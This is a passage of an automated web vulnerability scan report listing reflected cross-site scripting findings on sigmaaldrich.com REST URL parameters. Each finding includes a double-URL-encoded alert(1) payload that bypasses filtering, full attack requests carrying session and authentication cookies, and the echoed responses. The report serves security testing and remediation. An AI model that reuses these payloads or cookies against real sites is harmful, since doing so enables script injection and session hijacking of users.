Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:13 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry8c1b7";alert(1)//a5911bef3e6/stockroom-reagents","E404") ;
   </script>
...[SNIP]...

1.98. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagents

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7c82%2522%253balert%25281%2529%252f%252f18170b86b7a was submitted in the REST URL parameter 5. This input was echoed as e7c82";alert(1)//18170b86b7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagentse7c82%2522%253balert%25281%2529%252f%252f18170b86b7a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:15 GMT
Content-Length: 28972
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/chemistry/stockroom-reagentse7c82";alert(1)//18170b86b7a","E404") ;
   </script>
...[SNIP]...

1.99. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1225e%2522%253balert%25281%2529%252f%252fb54150aa7a4 was submitted in the REST URL parameter 1. This input was echoed as 1225e";alert(1)//b54150aa7a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content1225e%2522%253balert%25281%2529%252f%252fb54150aa7a4/sigma-aldrich/areas-of-interest/labware/labware-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content1225e";alert(1)//b54150aa7a4/sigma-aldrich/areas-of-interest/labware/labware-catalog","E404") ;
   </script>
...[SNIP]...

1.100. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46b3b%2522%253balert%25281%2529%252f%252f4dfd3aae0d8 was submitted in the REST URL parameter 2. This input was echoed as 46b3b";alert(1)//4dfd3aae0d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich46b3b%2522%253balert%25281%2529%252f%252f4dfd3aae0d8/areas-of-interest/labware/labware-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich46b3b";alert(1)//4dfd3aae0d8/areas-of-interest/labware/labware-catalog","E404") ;
   </script>
...[SNIP]...

1.101. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72b7a%2522%253balert%25281%2529%252f%252f26ba52d9125 was submitted in the REST URL parameter 3. This input was echoed as 72b7a";alert(1)//26ba52d9125 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest72b7a%2522%253balert%25281%2529%252f%252f26ba52d9125/labware/labware-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest72b7a";alert(1)//26ba52d9125/labware/labware-catalog","E404") ;
   </script>
...[SNIP]...

1.102. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/labware/labware-catalog [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/labware/labware-catalog

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53984%2522%253balert%25281%2529%252f%252fe172f22c51a was submitted in the REST URL parameter 4. This input was echoed as 53984";alert(1)//e172f22c51a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/labware53984%2522%253balert%25281%2529%252f%252fe172f22c51a/labware-catalog HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
